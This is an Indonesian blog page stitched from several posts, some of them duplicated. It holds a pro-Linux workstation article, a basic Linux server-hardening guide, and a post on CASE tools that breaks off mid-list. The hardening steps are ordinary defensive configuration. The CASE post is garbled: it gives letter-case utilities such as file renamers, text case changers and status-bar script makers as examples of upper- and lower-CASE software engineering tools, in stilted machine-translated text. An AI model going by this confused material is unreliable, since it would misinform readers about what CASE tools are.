Sekarang kita lihat aplikasi-aplikasi apa yang -menyentuh -kehidupan kita sehari hari:
Aplikasi Office seperti pengolah kata, pengolah tabel, modul presentasi, dan lain-lainnya
Sudah ada semua dalam Linux yaitu Star Office atau juga Open Office yang juga bisa kita download gratis tanpa takut disebut pembajak :)
Oh iya, jangan takut.. semua ini adanya dalam modus grafik bukan dalam modus teks. Seperti yang kita ketahui ada beberapa diantara kita yang beranggapan bahwa Linux itu isinya teks semua. Anggapan tersebut tidak sepenuhnya keliru, karena kalau kita pergunakan Linux sebagai Server kita tidak butuh modus grafiknya. Tetapi untuk workstation pasti kita butuhkan modus grafik, yang bisa kita pasang saat penginstallannya. Modus grafik itu biasa disebut X Windows
Aplikasi lain seperti aplikasi2x internet, email reader, web browser, dial up connection banyak macamnya di Linux missal Kmail dan Ximian untuk email client/reader, Konqueror, Mozilla, Netscape, Opera untuk web browser.
Memutar video ? mp3 ? jangan khawatir kita bisa menginstall XMMS mp3 player, Xine untuk vcd player bahkan real player (salah satu aplikasi untuk memutar live streaming) sudah ada dalam beberapa distro yang ada. Dan itu semua Anda dapat temukan dalam CD installer Linux.
Bekerja dengan linux
Dari penjelasan diatas rasa-rasanya tidak ada yang menahan kita untuk berpindah menggunakan Linux sebagai "teman kerja" Anda. Apapun profesi Anda Linux siap menunjang Anda dengan aplikasi2xnya yang sudah mulai dikembangkan oleh vendor2x besar, seperti Star Office oleh Sun, Corel Photopaint oleh Corel Inc.
Pasti akan timbul pertanyaan, "Gimana nih, saya khan biasa ngedesain gambar memanipulasi image dan sebagainya termasuk ngerender 3D.. kalau aplikasi2x gitu ajah sih.. paling cuman sekretaris yang pake...!!!" He hehehe.. jangan khawatir untuk Anda para yang bersuara seperti diatas ada pemecahannya. Kita bisa pakai The Gimp untuk mengolah gambar selain itu kita juga bisa menggunakan Corel Photopaint. Untuk aplikasi 3D kita bisa gunakan Maya.
Dan semuanya itu bisa kita download dari internet secara gratis tanpa melanggar hak cipta.
Sebagai gambaran, penulis yang sehari2xnya bekerja sebagai Web Developer mau tidak mau pasti berhubungan dengan yang namanya pengolahan gambar, teks editor dan sebagainya. Memang pada mulanya butuh penyesuaian, tetapi kita kan bisa karena biasa.
Penulis sendiri menggunakan distro SuSe 8.0, KDE untuk modus grafiknya, The Gimp untuk pengolahan gambarnya, dan KATE untuk teks editornya serta Star Office untuk aplikasi Officenya.
Beralih ke Linux
So.... Tunggu apa lagi ? kenapa kita ragu2x untuk berpindah ke Linux?. Butuh support ? di Indonesia sendiri sudah mulai banyak kelompok2x penggemar Linux yang tergabung dalam KPLI yang tersebar dari sabang sampai merauke, Yayasan Linux Indonesia, dan sebagainya.
Butuh support cepat ? tinggak connect ke internet dan buka aplikasi Internet Relay Chat (di Linux ada Kvirc atau BitchX) dan join dengan network dal.net dan gabung dengan channel #indolinux.. :) disitu tempat anak2x "maniak" Linux "nongkrong". Ada kesulitan? Jangan segan2x bertanya, karena pasti dijawab oleh salah satu dari mereka, bahkan Andapun bisa "nongkrong" di channel tersebut untuk hanya sekedar ngobrol sana sini tentang Linux... :)
Pakai Linux??? Siapa takuttttt............................ :)
Bi[G]
Ady Permadi, IT Profesional yang bekerja dengan Linux
Artikel ini dedikasikan untuk para Linuxers yang sering "nongkrong" di channel #indolinux dal.net (sekarang efnet.net) yang tidak bisa disebutkan satu persatu.
Contoh screenshots:
http://www.arinet.org/download/mydesktop_with_dual_monitor.jpg
http://www.arinet.org/download/ximian_evolution_email_client.png
http://www.arinet.org/download/ximian_evolution_email_client_default.png
Read More..
Apa bener teman kita itu jago banget :) atau kita-nya yang males belajar sesuatu yang bisa dibilang tidak baru juga. Sebelum kita kategorikan Linux, kita coba cari tahu makhluk apakah yang namanya Linux itu?.Secara garis besar Linux adalah sebuah sistem operasi komputer, yg sebelumnya kita mungkin sering pakai sistem operasi bernama windows, dos, mac dab sebagainya. Saya disini tidak ingin berbicara panjang lebar tentang Linuxnya, sudah banyak tulisan yg membahas tentang Linuxnya itu sendiri.
Linuxnya itu sendiri berbagai macam distronya. Distro?, Apakah distro itu?. Distro bisa kita sebut paket atau pemaketan, karena inti dari masing2x Linux (kernel) dari masing2x distro itu adalah sama, yang berbeda adalah cara atau bagaimana pemaketannya.
Banyak ragamnya distro Linux, diantaranya Red Hat, SuSe, Slackware, Mandrake, Debian juga tidak ketinggalan distro produk dalam negeri kita sendiri, seperti Trustik Merdeka, Software RI dan sebagainya. (Untuk pembahasan distro dalam negeri sudah dibahas di edisi sebelumnya).
Untuk mudahnya kita bagi dua kategori pemakain Linux, yaitu sebagai Server dan sebagai Wokstation. Mungkin ada juga yg menambahkan kategori Linux sebagai Mobile OS (karena Linux bisa diinstall di Ponsel, PDA dan juga Notebook).
Linux sebagai Server
Linux sebagai server sudah banyak kita dengar, karena rata2x kalau kita mendengar kata Linux maka identik dengan server. Memang tidak ada salahnya, karena sebagian besar server Internet yg dipergunakan sebagai Web Server berbasiskan Linux. Kenapa? Kenapa sebagian besar orang memilih Linux sebagai Web Server?. Mungkin akan kita bahas lain kali.
Untuk sekarang kita membahas Linux sebagai Workstation
Linux sebagai Workstation
Kalau kita melihat tema paragrap diatas, Linux sebagai Workstation, diantara kita pasti ada yg menjawab "Mana mungkinnnnnn....!!!!" :) Ya jawaban seperti itu tidak aneh kalau kita dengar dan bagi orang2x yang belum mengenal begitu jauh tentang Linux. Kalau saya bilang bekerja dengan Linux -dalam arti sebagai workstation -adalah mungkin sekali. Semua aplikasi yang biasa kita pergunakan - di sistem operasi lain -sehari hari, kebanyakan sudah ada versi Linuxnya. Yang membedakan mungkin vendor pembuatnya, dan yang asyiknya adalah kebanyakan berlisensii GPL (General Public License) alias GRATIS!!! untuk di download dan dicoopy ulang..
Sekarang kita lihat aplikasi-aplikasi apa yang -menyentuh -kehidupan kita sehari hari:
Aplikasi Office seperti pengolah kata, pengolah tabel, modul presentasi, dan lain-lainnya
Sudah ada semua dalam Linux yaitu Star Office atau juga Open Office yang juga bisa kita download gratis tanpa takut disebut pembajak :)
Oh iya, jangan takut.. semua ini adanya dalam modus grafik bukan dalam modus teks. Seperti yang kita ketahui ada beberapa diantara kita yang beranggapan bahwa Linux itu isinya teks semua. Anggapan tersebut tidak sepenuhnya keliru, karena kalau kita pergunakan Linux sebagai Server kita tidak butuh modus grafiknya. Tetapi untuk workstation pasti kita butuhkan modus grafik, yang bisa kita pasang saat penginstallannya. Modus grafik itu biasa disebut X Windows
Aplikasi lain seperti aplikasi2x internet, email reader, web browser, dial up connection banyak macamnya di Linux missal Kmail dan Ximian untuk email client/reader, Konqueror, Mozilla, Netscape, Opera untuk web browser.
Memutar video ? mp3 ? jangan khawatir kita bisa menginstall XMMS mp3 player, Xine untuk vcd player bahkan real player (salah satu aplikasi untuk memutar live streaming) sudah ada dalam beberapa distro yang ada. Dan itu semua Anda dapat temukan dalam CD installer Linux.
Bekerja dengan linux
Dari penjelasan diatas rasa-rasanya tidak ada yang menahan kita untuk berpindah menggunakan Linux sebagai "teman kerja" Anda. Apapun profesi Anda Linux siap menunjang Anda dengan aplikasi2xnya yang sudah mulai dikembangkan oleh vendor2x besar, seperti Star Office oleh Sun, Corel Photopaint oleh Corel Inc.
Pasti akan timbul pertanyaan, "Gimana nih, saya khan biasa ngedesain gambar memanipulasi image dan sebagainya termasuk ngerender 3D.. kalau aplikasi2x gitu ajah sih.. paling cuman sekretaris yang pake...!!!" He hehehe.. jangan khawatir untuk Anda para yang bersuara seperti diatas ada pemecahannya. Kita bisa pakai The Gimp untuk mengolah gambar selain itu kita juga bisa menggunakan Corel Photopaint. Untuk aplikasi 3D kita bisa gunakan Maya.
Dan semuanya itu bisa kita download dari internet secara gratis tanpa melanggar hak cipta.
Sebagai gambaran, penulis yang sehari2xnya bekerja sebagai Web Developer mau tidak mau pasti berhubungan dengan yang namanya pengolahan gambar, teks editor dan sebagainya. Memang pada mulanya butuh penyesuaian, tetapi kita kan bisa karena biasa.
Penulis sendiri menggunakan distro SuSe 8.0, KDE untuk modus grafiknya, The Gimp untuk pengolahan gambarnya, dan KATE untuk teks editornya serta Star Office untuk aplikasi Officenya.
Beralih ke Linux
So.... Tunggu apa lagi ? kenapa kita ragu2x untuk berpindah ke Linux?. Butuh support ? di Indonesia sendiri sudah mulai banyak kelompok2x penggemar Linux yang tergabung dalam KPLI yang tersebar dari sabang sampai merauke, Yayasan Linux Indonesia, dan sebagainya.
Butuh support cepat ? tinggak connect ke internet dan buka aplikasi Internet Relay Chat (di Linux ada Kvirc atau BitchX) dan join dengan network dal.net dan gabung dengan channel #indolinux.. :) disitu tempat anak2x "maniak" Linux "nongkrong". Ada kesulitan? Jangan segan2x bertanya, karena pasti dijawab oleh salah satu dari mereka, bahkan Andapun bisa "nongkrong" di channel tersebut untuk hanya sekedar ngobrol sana sini tentang Linux... :)
Pakai Linux??? Siapa takuttttt............................ :)
Bi[G]
Ady Permadi, IT Profesional yang bekerja dengan Linux
Artikel ini dedikasikan untuk para Linuxers yang sering "nongkrong" di channel #indolinux dal.net (sekarang efnet.net) yang tidak bisa disebutkan satu persatu.
Contoh screenshots:
http://www.arinet.org/download/mydesktop_with_dual_monitor.jpg
http://www.arinet.org/download/ximian_evolution_email_client.png
http://www.arinet.org/download/ximian_evolution_email_client_default.png
Read More..
Jumat, 11 Desember 2009
Basic security di Linux
Sebuah server linux yang aman tergantung bagaimana administrator membuat server tersebut. Berikut ini akan dijelaskan hal-hal yang berkaitan dengan masalah keamanan.i) Keamanan BIOS
Berilah boot password pada BIOS anda, karena orang lain bisa saja mem-boot system anda dengan menggunakan boot disk khusus.
ii) Set-lah panjang minimum password bagi user agar sulit untuk ditebak.
Kita bisa melakukan hal ini dengan cara mengedit file /etc/login.defs. Contoh:
vi /etc/login.defs
Editlah baris PASS_MIN_LEN 5
menjadi PASS_MIN_LEN 8
iii) Untuk alasan keamanan, jangan pernah login sebagai root kecuali memang sedang membutuhkan akses root. Dan jangan pernah meninggalkan login root begitu saja dari komputer kita tanpa logout terlebih dahulu.
iv) Mengeset login time out untuk account root
Editlah file /etc/profile dan tambahkan baris TMOUT setelah baris HISTSIZE. Contoh:
vi /etc/profile
tambahkan baris berikut:
TMOUT=7200
v) Disable servis-servis yang ada pada /etc/inetd.conf
vi /etc/inetd.conf
matikanlah servis-servis yang masih terbuka pada /etc/inetd.conf dengan memberikan tanda #. Sehingga file /etc/inetd.conf akan menjadi seperti:
# To re-read this file after changes, just do a 'killall -HUP inetd’
#
#echo stream tcp nowait root internal
#echo dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal
#daytime dgram udp wait root internal
#chargen stream tcp nowait root internal
#chargen dgram udp wait root internal
#time stream tcp nowait root internal
#time dgram udp wait root internal
#
# These are standard services.
#
#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
#
# Shell, login, exec, comsat and talk are BSD protocols.
#
#shell stream tcp nowait root /usr/sbin/tcpd in.rshd
#login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
#comsat dgram udp wait root /usr/sbin/tcpd in.comsat
#talk dgram udp wait root /usr/sbin/tcpd in.talkd
#ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd
#dtalk stream tcp wait nobody /usr/sbin/tcpd in.dtalkd
#
# Pop and imap mail services et al
#
#pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
#pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
#imap stream tcp nowait root /usr/sbin/tcpd imapd
#
# The Internet UUCP service.
#
#uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l
#
# Tftp service is provided primarily for booting. Most sites
# run this only on machines acting as "boot servers." Do not uncomment
# this unless you *need* it.
#
#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd
#bootps dgram udp wait root /usr/sbin/tcpd bootpd
#
# Finger, systat and netstat give out user information which may be
# valuable to potential "system crackers." Many sites choose to disable
# some or all of these services to improve security.
#
#finger stream tcp nowait root /usr/sbin/tcpd in.fingerd
#cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd
#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx
#netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
#
# Authentication
#
#auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o
#
# End of inetd.conf
Setelah itu restartlah inetd anda dengan mengetikkan perintah:
killall -HUP inetd
Setelah direstart, buatlah file /etc/inetd.conf immutable sehingga tidak akan dapat dimodifikasi atau direname.
chattr +i /etc/inetd.conf
vi) Pemanfaatan TCP_WRAPPERS
Dengan TCP_WRAPPERS kita dapat dengan mudah menolak atau mengijinkan user-user yang akan mengakses komputer kita.
• Edit file /etc/hosts.deny (vi /etc/hosts.deny) sehingga menjadi:
# Deny access to everyone.
ALL: ALL@ALL, PARANOID
Perintah di atas akan membuat semua servis dan semua lokasi ditolak secara default kecuali diijinkan melalui pendefinisian di hosts.allow.
• Edit file /etc/hosts.allow (vi /etc/hosts.allow) sehingga host-host yang kita percayai dapat mengakses komputer kita. Contoh:
sshd: 203.132.134.123 testing.com
Maksud dari baris di atas adalah TCP_WRAPPERS mengijinkan akses ssh melalui IP 203.132.134.123 dan atau dari host testing.com.
vii) Edit file /etc/securetty, file ini mendefinisikan kebolehan root untuk akses di virtual terminal ke berapa. Contoh:
tty1
#tty2
#tty3
#tty4
#tty5
#tty6
#tty7
#tty8
Konfigurasi di atas akan membuat root hanya bisa login pada tty1 saja.
viii) Edit file /etc/lilo.conf dan tambahkan baris timeout=00, restricted, dan password. Contoh:
boot=/dev/sda
map=/boot/map
install=/boot/boot.b
prompt
timeout=00
Default=linux
restricted
password=
image=/boot/vmlinuz-2.2.12-20
label=linux
initrd=/boot/initrd-2.2.12-10.img
root=/dev/sda6
read-only
Lalu ubahlah mode file tersebut agar hanya root saja yang bisa membaca file tersebut. Ketikkan perintah:
chmod 600 /etc/lilo.conf. Setelah itu, aktifkan kembali lilo dengan setting baru;
lilo
ix) Menghilangkan akses shutdown melalui tombol Ctrl-Alt-Del.
Untuk bisa seperti itu, maka kita harus mengedit file /etc/inittab pada baris:
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
sehingga menjadi:
#ca::ctrlaltdel:/sbin/shutdown -t3 -r now
lalu aktifkan perubahan tersebut dengan perintah:
init q
Sebetulnya masih banyak faktor keamanan lain yang bisa dilakukan. Anda dapat memperolehnya di buku-buku yang membahas tentang security atau dari internet.
Read More..
Berilah boot password pada BIOS anda, karena orang lain bisa saja mem-boot system anda dengan menggunakan boot disk khusus.
ii) Set-lah panjang minimum password bagi user agar sulit untuk ditebak.
Kita bisa melakukan hal ini dengan cara mengedit file /etc/login.defs. Contoh:
vi /etc/login.defs
Editlah baris PASS_MIN_LEN 5
menjadi PASS_MIN_LEN 8
iii) Untuk alasan keamanan, jangan pernah login sebagai root kecuali memang sedang membutuhkan akses root. Dan jangan pernah meninggalkan login root begitu saja dari komputer kita tanpa logout terlebih dahulu.
iv) Mengeset login time out untuk account root
Editlah file /etc/profile dan tambahkan baris TMOUT setelah baris HISTSIZE. Contoh:
vi /etc/profile
tambahkan baris berikut:
TMOUT=7200
v) Disable servis-servis yang ada pada /etc/inetd.conf
vi /etc/inetd.conf
matikanlah servis-servis yang masih terbuka pada /etc/inetd.conf dengan memberikan tanda #. Sehingga file /etc/inetd.conf akan menjadi seperti:
# To re-read this file after changes, just do a 'killall -HUP inetd’
#
#echo stream tcp nowait root internal
#echo dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal
#daytime dgram udp wait root internal
#chargen stream tcp nowait root internal
#chargen dgram udp wait root internal
#time stream tcp nowait root internal
#time dgram udp wait root internal
#
# These are standard services.
#
#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
#
# Shell, login, exec, comsat and talk are BSD protocols.
#
#shell stream tcp nowait root /usr/sbin/tcpd in.rshd
#login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
#comsat dgram udp wait root /usr/sbin/tcpd in.comsat
#talk dgram udp wait root /usr/sbin/tcpd in.talkd
#ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd
#dtalk stream tcp wait nobody /usr/sbin/tcpd in.dtalkd
#
# Pop and imap mail services et al
#
#pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
#pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
#imap stream tcp nowait root /usr/sbin/tcpd imapd
#
# The Internet UUCP service.
#
#uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l
#
# Tftp service is provided primarily for booting. Most sites
# run this only on machines acting as "boot servers." Do not uncomment
# this unless you *need* it.
#
#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd
#bootps dgram udp wait root /usr/sbin/tcpd bootpd
#
# Finger, systat and netstat give out user information which may be
# valuable to potential "system crackers." Many sites choose to disable
# some or all of these services to improve security.
#
#finger stream tcp nowait root /usr/sbin/tcpd in.fingerd
#cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd
#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx
#netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
#
# Authentication
#
#auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o
#
# End of inetd.conf
Setelah itu restartlah inetd anda dengan mengetikkan perintah:
killall -HUP inetd
Setelah direstart, buatlah file /etc/inetd.conf immutable sehingga tidak akan dapat dimodifikasi atau direname.
chattr +i /etc/inetd.conf
vi) Pemanfaatan TCP_WRAPPERS
Dengan TCP_WRAPPERS kita dapat dengan mudah menolak atau mengijinkan user-user yang akan mengakses komputer kita.
• Edit file /etc/hosts.deny (vi /etc/hosts.deny) sehingga menjadi:
# Deny access to everyone.
ALL: ALL@ALL, PARANOID
Perintah di atas akan membuat semua servis dan semua lokasi ditolak secara default kecuali diijinkan melalui pendefinisian di hosts.allow.
• Edit file /etc/hosts.allow (vi /etc/hosts.allow) sehingga host-host yang kita percayai dapat mengakses komputer kita. Contoh:
sshd: 203.132.134.123 testing.com
Maksud dari baris di atas adalah TCP_WRAPPERS mengijinkan akses ssh melalui IP 203.132.134.123 dan atau dari host testing.com.
vii) Edit file /etc/securetty, file ini mendefinisikan kebolehan root untuk akses di virtual terminal ke berapa. Contoh:
tty1
#tty2
#tty3
#tty4
#tty5
#tty6
#tty7
#tty8
Konfigurasi di atas akan membuat root hanya bisa login pada tty1 saja.
viii) Edit file /etc/lilo.conf dan tambahkan baris timeout=00, restricted, dan password. Contoh:
boot=/dev/sda
map=/boot/map
install=/boot/boot.b
prompt
timeout=00
Default=linux
restricted
password=
image=/boot/vmlinuz-2.2.12-20
label=linux
initrd=/boot/initrd-2.2.12-10.img
root=/dev/sda6
read-only
Lalu ubahlah mode file tersebut agar hanya root saja yang bisa membaca file tersebut. Ketikkan perintah:
chmod 600 /etc/lilo.conf. Setelah itu, aktifkan kembali lilo dengan setting baru;
lilo
ix) Menghilangkan akses shutdown melalui tombol Ctrl-Alt-Del.
Untuk bisa seperti itu, maka kita harus mengedit file /etc/inittab pada baris:
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
sehingga menjadi:
#ca::ctrlaltdel:/sbin/shutdown -t3 -r now
lalu aktifkan perubahan tersebut dengan perintah:
init q
Sebetulnya masih banyak faktor keamanan lain yang bisa dilakukan. Anda dapat memperolehnya di buku-buku yang membahas tentang security atau dari internet.
Read More..
Rabu, 28 Oktober 2009
Case Tool
* Kepanjangannya Computer-Aided Software Engineering atau Computer-Assisted Software Engineering
*Perangkat lunak yang berguna bagi para pengembang dalam merencanakan, menganalisa, merancang, melakukan pemrograman, dan memelihara sistem sistem informasi
*Tujuan utama CASE dibentuk adalah untuk mengalihkan sejumlah beban yang biasanya dipikul oleh pengembang sistem kepada komputer
ന*
Perangkat CASE yang lengkap mengandung perangkat uppercase dan lowercase
Lowercase
* merupakan perangkat CASE yang berfungsi sebagai pembangkit kode (code generator), yakni menghasilkan kode program berdasarkan suatu spesifikasi rancangan
contoh aplikasi Lowercase
* febooti fileTweak Case 1.1
Ubah file / folder kasus. Anda dapat memodifikasi berkas kasus dengan mengubah ke huruf besar, huruf kecil, Title Case, kasus kalimat, toggle CASE, acak kasus. Ini dapat memproses satu file / folder serta subfolder pohon. Berdiri sendiri anggota (modul) dari febooti fileTweak.
* Batch Zip Toolkit V2.04
Zip batch Toolkit adalah pemenang penghargaan, semua dalam satu file kompresi paket yang memungkinkan Anda untuk kompres dan dekompresi file secara individu - dalam Toolkit Zip Batch batch.Although didasarkan sekitar format Zip yang populer, dalam kenyataan itu benar-benar mendukung 13 format kompresi yang berbeda, termasuk Lha , Gzip, BlakHole, Cab, Tar, Lzh, arj, Ace dan Toolkit Zip Rar.Batch juga dapat memampatkan file Anda secara individual melalui direktori (rekursif) menghemat waktu dan usaha. Jika Anda perlu membuat file extracting diri, menunjukkan Batch Tootkit Zip file Anda ingin mengkonversi dan klik tombol tunggal. Ini benar-benar adalah yang sederhana. File-file ini dapat dibagi di antara teman dan kolega Anda, bahkan jika mereka tidak memiliki Batch t Toolkit Zip terinstall pada Toolkit Zip machine.Batch mereka juga memiliki dibangun di utilitas konversi. Memungkinkan Anda memiliki 10 file dalam format RAR dan anda d ingin mengkonversi mereka ke format Zip, lagi-lagi Anda memilih file yang ingin Anda mengkonversi dan klik tombol 1. Dalam beberapa detik, file Anda akan converted.We juga mengerti bahwa Anda mungkin ingin Batch file Zip yang mungkin memiliki nama file yang tidak teratur, misalnya, jika Anda memiliki file folder penuh dengan kedua huruf besar dan huruf kecil nama-nama file yang tidak seragam , dengan menggunakan fasilitas ganti nama dalam Toolkit Zip Batch, Anda dapat di klik tombol, berganti nama mereka untuk huruf besar atau huruf kecil dalam beberapa detik, terus siap untuk consitent melihat arsip untuk CDR.
* Another Notepad 1.34
Jendela editor teks. Berikut adalah berguna editor teks dengan semua fitur yang nyaman Microsoft kiri keluar dari utilitas Windows Notepad. Hanya beberapa fitur: Urutkan baris teks alfabetis; Convert blok teks untuk semua huruf besar atau huruf kecil; Penggabungan dua file bersama-sama; WordStar perintah kunci; Smart tabs; Auto-lekukan; User-didefinisikan margin; Firman membungkus; Ubah font; load file 16MB.
* Excel change case in multiple cells to u 2.0
Mudah mengubah sel excel kasus dengan klik tombol! Pilih excel beberapa sel yang Anda ingin mengubah format untuk, dan voila! Hal ini dilakukan! Fitur utama: * Pilih sekelompok sel dari spreadsheet excel Anda untuk mengubah kasus untuk * Klik pada tombol untuk memilih huruf besar, huruf kecil, atau kasus yang layak (yaitu, huruf besar, dll). * Dan menikmati kemudahan penggunaan software ini untuk ms excel!
* LangOver 5.0
LangOver - Apakah baik untuk perangkat lunak ini, sih? Apakah Anda pernah mencoba mengetik dalam satu bahasa tetapi hasilnya lain? Annoying, eh?! Itu s karena layout keyboard berada di salah ll language.With LangOver Anda dapat mengubah teks Anda dengan cepat antara bahasa-bahasa. Gunakan F10 (Untuk campur-baur antara bahasa-bahasa )---------------------------------------- ------------ Cukup klik F10 - dan teks Anda akan dipasang! LangOver mendukung bahasa apa pun. Hal ini dapat mengkonversi dari APAPUN ke Bahasa INGGRIS, dan dari INGGRIS ke Bahasa APAPUN. * Gunakan SHIFT + F10 untuk mengkonversi huruf besar / huruf kecil teks: Gunakan ABCABC F6 (Untuk membalik teks )----------------------------- ------- Selain dapat membalikkan LangOver teks Anda: ABCCBA
Uppercase
* Dukungan yang tersedia berupa:
Perangkat pembuat diagram (diagramming tool). Perangkat ini berguna untuk membuat DFD (Data Flow Diagram)
Pembangkit layar dan laporan (screen and report generator). Perangkat ini dapat dipakai untuk membuat prototipe laporan dengan cara memasukkan kolom atau field data pada layar.
contoh aplikasi Uppercase
* Free StatusTitle Maker 6.1
Free StatusTitle Maker menciptakan kode JavaScript untuk menampilkan pesan dalam judul dan status bar. Anda dapat menggambarkan tujuan link dalam judul atau status bar bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikendalikan judul bar dan 19 efek untuk dikendalikan status bar.
* Yaldex StatusTitle Maker 5.0 5.1
Maker Yaldex StatusTitle menghasilkan kode JavaScript untuk menampilkan pesan dalam status atau judul bar. Sebagai contoh, Anda dapat menggambarkan tujuan link dalam status bar atau judul bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikontrol status bar dan 19 dikontrol efek untuk batang judul.
* KeyCleanse 1.0
KeyCleanse adalah kata kunci utama alat manajemen dan daftar bersih. Fitur-fiturnya termasuk menghapus duplikat, minimum dan maksimum menghapus kata-kata, kata-kata menghapus melebihi batas karakter, menyeret, menghitung, dan kata-kata untuk mengubah semua huruf besar, huruf kecil atau judul kasus. KeyCleanse menghapus kata kunci yang tidak memenuhi persyaratan Anda dan hanya meninggalkan kata kunci yang Anda butuhkan. KeyCleanse adalah aplikasi gratis.
* File Renamer Pro 2.0
File Renamer Pro adalah yang mudah digunakan File Renamer memungkinkan Anda untuk mengubah nama beberapa file dan folder sekaligus. Ini menawarkan berbagai cara untuk mengubah nama file, termasuk huruf besar, huruf kecil, mengubah nama ekstensi file, penyisipan, penghapusan, string pengganti, berurut mengubah nama dan Renamer more.File Pro dapat mengubah nama file MP3 yang didasarkan pada informasi tag ID3 (misalnya nama artis, judul dll ). Program ini memberikan preview file baru names.It mendukung drag dan drop.
* Yaldex StatusTitle Maker 6.1
Maker Yaldex StatusTitle menciptakan kode JavaScript untuk menampilkan pesan dalam judul dan status bar. Anda dapat menggambarkan tujuan link dalam judul atau status bar bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikendalikan judul bar dan 19 efek untuk dikendalikan status bar.
Mungkin itu yang saya ketahui tentang Case Tool
Terima Kasih
Read More..
*Perangkat lunak yang berguna bagi para pengembang dalam merencanakan, menganalisa, merancang, melakukan pemrograman, dan memelihara sistem sistem informasi
*Tujuan utama CASE dibentuk adalah untuk mengalihkan sejumlah beban yang biasanya dipikul oleh pengembang sistem kepada komputer
ന*
Perangkat CASE yang lengkap mengandung perangkat uppercase dan lowercase
Lowercase
* merupakan perangkat CASE yang berfungsi sebagai pembangkit kode (code generator), yakni menghasilkan kode program berdasarkan suatu spesifikasi rancangan
contoh aplikasi Lowercase
* febooti fileTweak Case 1.1
Ubah file / folder kasus. Anda dapat memodifikasi berkas kasus dengan mengubah ke huruf besar, huruf kecil, Title Case, kasus kalimat, toggle CASE, acak kasus. Ini dapat memproses satu file / folder serta subfolder pohon. Berdiri sendiri anggota (modul) dari febooti fileTweak.
* Batch Zip Toolkit V2.04
Zip batch Toolkit adalah pemenang penghargaan, semua dalam satu file kompresi paket yang memungkinkan Anda untuk kompres dan dekompresi file secara individu - dalam Toolkit Zip Batch batch.Although didasarkan sekitar format Zip yang populer, dalam kenyataan itu benar-benar mendukung 13 format kompresi yang berbeda, termasuk Lha , Gzip, BlakHole, Cab, Tar, Lzh, arj, Ace dan Toolkit Zip Rar.Batch juga dapat memampatkan file Anda secara individual melalui direktori (rekursif) menghemat waktu dan usaha. Jika Anda perlu membuat file extracting diri, menunjukkan Batch Tootkit Zip file Anda ingin mengkonversi dan klik tombol tunggal. Ini benar-benar adalah yang sederhana. File-file ini dapat dibagi di antara teman dan kolega Anda, bahkan jika mereka tidak memiliki Batch t Toolkit Zip terinstall pada Toolkit Zip machine.Batch mereka juga memiliki dibangun di utilitas konversi. Memungkinkan Anda memiliki 10 file dalam format RAR dan anda d ingin mengkonversi mereka ke format Zip, lagi-lagi Anda memilih file yang ingin Anda mengkonversi dan klik tombol 1. Dalam beberapa detik, file Anda akan converted.We juga mengerti bahwa Anda mungkin ingin Batch file Zip yang mungkin memiliki nama file yang tidak teratur, misalnya, jika Anda memiliki file folder penuh dengan kedua huruf besar dan huruf kecil nama-nama file yang tidak seragam , dengan menggunakan fasilitas ganti nama dalam Toolkit Zip Batch, Anda dapat di klik tombol, berganti nama mereka untuk huruf besar atau huruf kecil dalam beberapa detik, terus siap untuk consitent melihat arsip untuk CDR.
* Another Notepad 1.34
Jendela editor teks. Berikut adalah berguna editor teks dengan semua fitur yang nyaman Microsoft kiri keluar dari utilitas Windows Notepad. Hanya beberapa fitur: Urutkan baris teks alfabetis; Convert blok teks untuk semua huruf besar atau huruf kecil; Penggabungan dua file bersama-sama; WordStar perintah kunci; Smart tabs; Auto-lekukan; User-didefinisikan margin; Firman membungkus; Ubah font; load file 16MB.
* Excel change case in multiple cells to u 2.0
Mudah mengubah sel excel kasus dengan klik tombol! Pilih excel beberapa sel yang Anda ingin mengubah format untuk, dan voila! Hal ini dilakukan! Fitur utama: * Pilih sekelompok sel dari spreadsheet excel Anda untuk mengubah kasus untuk * Klik pada tombol untuk memilih huruf besar, huruf kecil, atau kasus yang layak (yaitu, huruf besar, dll). * Dan menikmati kemudahan penggunaan software ini untuk ms excel!
* LangOver 5.0
